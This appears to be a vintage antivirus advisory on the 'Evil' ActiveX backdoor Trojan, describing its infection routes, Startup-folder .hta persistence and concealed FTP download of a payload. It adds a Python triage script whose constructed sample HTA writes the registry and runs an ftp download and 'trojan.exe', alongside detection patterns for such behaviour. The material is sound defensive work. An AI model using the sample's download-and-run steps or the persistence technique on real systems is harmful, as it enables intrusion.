Evil, First Trojan Programmed in ActiveX

Evil, the first backdoor Trojan programmed in ActiveX, has just been discovered. Because of the Internet-based technology it uses, this new threat opens up a whole new field in the development of malicious code that acts through the Internet.

How does this Trojan attack?

Infection can take place simply by visiting a web page that carries the Trojan. As soon as the page is downloaded, the ActiveX control is executed, which installs the Trojan on the system. A second route is e-mail: the latest e-mail clients render HTML messages, so the code can be activated simply by opening a message written in HTML. Worse still, if the AutoPreview option of the mail reader is enabled, infection can occur merely by receiving a message whose HTML carries the malicious ActiveX control.

What effects does this backdoor Trojan produce?

What Evil does on a victim computer is execute a previously assigned program. The Trojan itself can download this program from the Internet without the user ever noticing. The effects therefore depend on the 'load' (payload) assigned to the Trojan. For example, Evil can be used to install an Internet Trojan that lets a malicious user remotely administer the victim computer, giving that user total control over the machine. It could equally execute viruses as damaging as CIH, or worms with the enormous propagation potential of Melissa. According to Panda's Worldwide Disinfection Center, 'personalizing the Trojan and assigning it an enormously dangerous load is as easy as changing a line of code.' Because the programs executed on the victim computer are downloaded from the Internet, the computer is left open to attack by any kind of malicious code.
In the sample sent to the Panda Worldwide Disinfection Center, the Trojan tried to download a file named trojan.exe from the FTP server of a well-known web site that offers free web hosting. This 'trojan.exe' could just as easily be replaced by a logic bomb, virus, worm or another Trojan. In short, the potential effects of this threat are as varied as malicious code itself, and Evil could even serve as a means of transport for threats yet to be developed.

How does it act?

The Trojan consists of malicious ActiveX code that, when embedded in an HTML page, creates a file in the Windows StartUp directory (English version of Windows). On Windows 95/98 the file is 'C:\windows\Start Menu\Programs\StartUp\windows95.hta'; on Windows NT it is 'C:\WINNT\Profiles\Default User\Start Menu\Programs\Startup\windowsNT.hta'. This file contains a series of commands that are executed each time the computer is restarted.

Evil's code also modifies the Windows registry with the aim of enabling the file and printer sharing option. However, the string it writes is too long, so this part of the payload fails. The part that does succeed opens a concealed FTP session to download the assigned program from the Internet, without the user being aware of the transfer. Once the file has been saved on the victim's computer, the Trojan executes it.

This malicious ActiveX control works under Internet Explorer 5 on Windows 95, 98 and NT.

How can users protect their computers?

The best way to combat this threat is to run a reliable and up-to-date antivirus, since Evil calls for protection at two levels. First, the antivirus must be able to detect malicious ActiveX controls and block them.
Second, because the Trojan's code can be modified to evade detection, the antivirus must also be kept current against the latest threats and be able to neutralize whatever program the Trojan attempts to download from the Internet. For example, if the Trojan did manage to install itself, a reliable antivirus would still detect a virus such as CIH as it was being downloaded. In this way the chances of a successful attack are greatly reduced.

Microsoft has released a patch that warns the user before an ActiveX control is executed when an HTML page is visited. Although such warnings are useful in making users think twice before running an ActiveX control, they do not detect malicious code: they are not antivirus programs, and they cannot determine whether the control about to run is benign or malicious. What they do provide is the chance for the user to decide whether or not to accept the risk of running an ActiveX control that comes from the Internet.

Lastly, we recommend not visiting 'underground' pages (those dealing with virus programming, hacking or other illegal activities) or pages offering illegal copies of programs, as they are likely to contain material carrying this type of threat.
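The persistence mechanism described above under 'How does it act?' (an .hta dropped into the Startup folder so that its commands run at every restart) suggests a triage check that does not depend on antivirus signatures, which, as the protection advice notes, a modified variant may evade. The following Python script is an added example and is not code from the Panda advisory. It looks for .hta files in the two Startup folders the advisory names, plus the modern per-user and all-users Startup locations, which are an assumption of this example, and flags generic indicators in their contents: registry writes, WScript.Shell execution, FTP transfers and references to .exe files. The indicator patterns and the sample HTA contents are constructed for illustration only; they are not Evil's actual code.

```python
"""Hunt for .hta persistence in Windows Startup folders.

Added example, not code from the Panda advisory. The advisory names two
Startup-folder .hta files (windows95.hta, windowsNT.hta) and describes
the behaviour in words; the folder list beyond those two paths, the
indicator regexes and the sample file contents below are assumptions
made for this example.
"""
import os
import re
import tempfile

# Startup folders named in the advisory (Windows 9x / NT) plus the modern
# per-user and all-users equivalents (assumed additions for current systems).
STARTUP_DIRS = [
    r"C:\windows\Start Menu\Programs\StartUp",
    r"C:\WINNT\Profiles\Default User\Start Menu\Programs\Startup",
    r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup",
    r"%ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp",
]

# Behaviours the advisory describes, expressed as generic HTA indicators
# (assumed patterns, not Evil's actual code).
INDICATORS = {
    "registry_write": re.compile(r"\bRegWrite\b", re.I),           # registry modification
    "shell_exec": re.compile(r"WScript\.Shell|\.Run\s*\(", re.I),  # launching programs
    "ftp_transfer": re.compile(r"\bftp(?:\.exe)?\b|\bftp://", re.I),  # concealed FTP download
    "download_exec": re.compile(r"\.exe\b", re.I),                 # executing a fetched binary
}


def find_startup_hta(startup_dirs):
    """Return the paths of .hta files present in any existing Startup folder."""
    hits = []
    for d in startup_dirs:
        d = os.path.expandvars(d)
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            if name.lower().endswith(".hta"):
                hits.append(os.path.join(d, name))
    return sorted(hits)


def triage_hta(text):
    """Return the set of indicator names matched by an HTA's source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def scan(startup_dirs):
    """Map each .hta found in the Startup folders to its sorted indicator list."""
    report = {}
    for path in find_startup_hta(startup_dirs):
        with open(path, "r", errors="replace") as f:
            report[path] = sorted(triage_hta(f.read()))
    return report


# Constructed sample data: a harmless .hta and a suspicious one. These are
# illustrative contents written for this example, not the Trojan's file.
BENIGN_HTA = "<html><body><p>Welcome</p></body></html>"
SUSPICIOUS_HTA = (
    '<script language="VBScript">\n'
    'Set sh = CreateObject("WScript.Shell")\n'
    'sh.RegWrite "HKLM\\Software\\Example\\Enable", 1, "REG_DWORD"\n'
    'sh.Run "ftp -s:c:\\cmds.txt example.invalid", 0\n'
    'sh.Run "c:\\trojan.exe", 0\n'
    "</script>"
)


def demo():
    """Build a throwaway Startup folder, populate it and scan it offline."""
    with tempfile.TemporaryDirectory() as tmp:
        startup = os.path.join(tmp, "Start Menu", "Programs", "StartUp")
        os.makedirs(startup)
        for fname, body in (("readme.txt", "ignore me"),
                            ("welcome.hta", BENIGN_HTA),
                            ("windows95.hta", SUSPICIOUS_HTA)):
            with open(os.path.join(startup, fname), "w") as f:
                f.write(body)
        return {os.path.basename(p): inds for p, inds in scan([startup]).items()}


if __name__ == "__main__":
    for name, inds in demo().items():
        print(f"{name}: {', '.join(inds) or 'no indicators'}")
```

On a live Windows system call scan(STARTUP_DIRS) instead of demo(); the NT path in the advisory covers only the Default User profile, so other profiles' Startup folders should be added to the list. An empty report is not proof that the machine is clean, since a variant could persist elsewhere; a non-empty one simply marks files worth a manual look, because any .hta in a Startup folder runs with the logged-on user's rights at every restart.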